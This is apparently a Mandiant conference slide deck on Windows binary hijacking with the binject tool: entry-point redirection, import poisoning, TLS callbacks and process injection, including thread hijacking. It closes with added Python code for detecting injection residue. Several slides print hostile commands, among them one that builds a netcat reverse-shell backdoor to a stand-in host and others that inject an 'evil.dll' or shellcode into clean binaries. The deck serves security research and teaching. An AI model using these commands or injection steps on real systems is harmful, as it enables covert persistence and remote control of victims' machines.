THE BLACK ART OF BINARY HIJACKING
Nick Harbour, Principal Consultant
nick.harbour@mandiant.com
Agenda
- Overview of Persistence Techniques
- Binary Hijacking with binject
  - Adding Sections
  - Entry Point Redirection
  - Import Poisoning
  - TLS Callbacks
  - Adding pre-made parasites
- Process Injection Parasites
- New Methods for Process Injection
Windows Persistence Techniques

Technique                    | Install   | Detect
Startup Folders              | Very Easy | Very Easy
Registry Run Keys            | Very Easy | Very Easy
Windows Services             | Easy      | Medium
Other Registry Hijacks       | Medium    | Medium
Binary Hijacking             | Difficult | Difficult
DLL Search Order Hijacking*  | Easy      | Very Difficult

*For more info visit http://blog.mandiant.com/archives/1207
Introducing Binject
- Very Simple Command Line Interface
- Point-and-shoot Binary Hijacking
- Add New Sections to a Binary
  - Can Fully Rebuild PE binaries to make room
- Redirect Entry Point to new Section
  - Raw (no pointer on stack)
  - Relative or Absolute pointer to OEP on the stack
  - DLL Support
DLL Entry Point Redirection

    push 0FFFF3392h       ; Delta to OEP
    pop eax
    call $+5              ; Get EIP
    add [esp], eax        ; Pointer to OEP left on stack
    ... Your Shellcode Here ...
    ret                   ; Back to OEP
Import Table Poisoning
- Force a binary to load your DLL
- Your DLL will load first
- Useful for API Hooking, sandboxing

    binject -i clean.exe -o hacked.exe -m evil.dll
Adding a TLS Callback
- Thread Local Storage (TLS) provides a mechanism to call a function on the following events:
  - Process start
  - Thread start
  - DLL attach
  - Thread terminate
  - Process terminate
- Will Execute BEFORE the entry point of the binary
- Only used if USER32.DLL is loaded

    binject -i clean.exe -o hacked.exe -d shellcode.bin --tls
Utility Wrapping
- Add a fixed command line to a binary
  - For example, hard code reverse shell switches onto the netcat binary.

    binject -i nc.exe -o backdoor.exe -c "fake.com 7777 -e cmd.exe"

- Coming soon: Add a fixed standard input to a binary
Adding a Pre-Made Parasite
- Shell-Code Payload
  - Process Inject Shellcode into a Target Process
    - CreateRemoteThread() method
    - QueueUserAPC() method
    - Main Thread Hijack method (new)
- Full EXE Payload
  - Dropper
  - In-Memory Process Replacement
Basic Process Injection Techniques
- Memory must be allocated in remote process (VirtualAllocEx)
- Data must be written to remote process (WriteProcessMemory)
- Remote process must execute newly written code
Controlling Execution
- CreateRemoteThread()
  - Forces a new thread to be created at a location of your choosing
  - Most traditional, well-known approach
  - Always freakin' works
- QueueUserAPC()
  - Force the process to add an asynchronous procedure call (APC) of your choosing
  - Process must use APC style of programming (hint: services.exe uses this)
Thread Hijacking - New Technique
- Find a thread to hijack
- Suspend the thread
- Save the thread context with GetThreadContext()
- Allocate space for your code and a stack
- Write your code to the process
- SetThreadContext() with EIP pointing to your code and ESP pointing to the new stack
- ResumeThread()
- Wait for the thread to suspend
- SetThreadContext() back to the original
- ResumeThread()
Notes on Thread Hijacking
- Less memory forensic residue
  - Thread is launched from valid executable range as opposed to remotely
- Injected code needs to suspend its thread when finished
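The three injection slides above describe one shared residue (executable private memory created with VirtualAllocEx and filled with WriteProcessMemory) and two different execution patterns: CreateRemoteThread() leaves a thread whose start address lies outside every loaded module, while thread hijacking reuses an existing thread whose start address stays legitimate, which is the "less forensic residue" the last slide points out and which also means Sysmon's CreateRemoteThread event (Event ID 8) never fires. The following is an added example, not code from the talk: detection logic for both patterns run over a constructed snapshot of one process. Real input would come from a memory-forensics framework or an EDR's thread and region enumeration; every address, module name and thread id below is invented for illustration.

```python
# Loaded modules of the hypothetical target process (constructed sample data)
MODULES = [
    {"name": "victim.exe",   "base": 0x00400000, "size": 0x00030000},
    {"name": "kernel32.dll", "base": 0x7C800000, "size": 0x000F6000},
    {"name": "ntdll.dll",    "base": 0x7C900000, "size": 0x000B0000},
]

# Committed memory regions: "image" is file-backed, "private" comes from VirtualAlloc(Ex)
REGIONS = [
    {"base": 0x00400000, "size": 0x00030000, "type": "image",   "protect": "r-x"},
    {"base": 0x00140000, "size": 0x00010000, "type": "private", "protect": "rw-"},  # ordinary heap
    {"base": 0x00390000, "size": 0x00001000, "type": "private", "protect": "rwx"},  # VirtualAllocEx + WriteProcessMemory residue
    {"base": 0x7C800000, "size": 0x000F6000, "type": "image",   "protect": "r-x"},
    {"base": 0x7C900000, "size": 0x000B0000, "type": "image",   "protect": "r-x"},
]

# Threads: where each was started and where its instruction pointer is right now
THREADS = [
    {"tid": 1234, "start": 0x00401000, "ip": 0x7C90E514},  # main thread, waiting inside ntdll
    {"tid": 1240, "start": 0x00390000, "ip": 0x00390010},  # CreateRemoteThread() pattern: started in private RWX
    {"tid": 1236, "start": 0x7C810665, "ip": 0x00390020},  # thread-hijack pattern: legitimate start, now in private RWX
]


def _containing(addr, items):
    """Return the module or region whose [base, base+size) range holds addr, else None."""
    return next((x for x in items if x["base"] <= addr < x["base"] + x["size"]), None)


def analyze(threads=THREADS, modules=MODULES, regions=REGIONS):
    """Return (subject, finding) tuples for the injection indicators in a process snapshot."""
    findings = []
    for r in regions:
        if r["type"] == "private" and "x" in r["protect"]:
            # Executable memory not backed by a file: what VirtualAllocEx leaves behind
            findings.append((f"{r['base']:#010x}", "PRIVATE_EXECUTABLE_REGION"))
    for t in threads:
        if _containing(t["start"], modules) is None:
            # Start address outside every loaded module: the classic remote-thread indicator
            findings.append((t["tid"], "START_OUTSIDE_MODULE"))
        ip_region = _containing(t["ip"], regions)
        if ip_region and ip_region["type"] == "private" and "x" in ip_region["protect"]:
            # The start address can look clean (the hijack case), but the thread is
            # executing out of private executable memory at the time of the snapshot
            findings.append((t["tid"], "EXECUTING_IN_PRIVATE_EXEC_MEMORY"))
    return findings


if __name__ == "__main__":
    for subject, finding in analyze():
        print(f"{subject}: {finding}")
```

The start-address check alone catches thread 1240 but not the hijacked thread 1236, which is the point of the last slide; the instruction-pointer and private-executable-region checks catch both, because the injected code still has to live somewhere the process did not map from a file. Regions that are executable and private also deserve a look when no thread currently points at them: per the slide, hijacked code suspends its thread when it is done, so the thread may be parked back in a legitimate module while the payload remains resident.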
Demo and Q&A
- nick.harbour@mandiant.com
- nickharbour@gmail.com
- Twitter: @nickharbour
- Website: www.rnicrosoft.net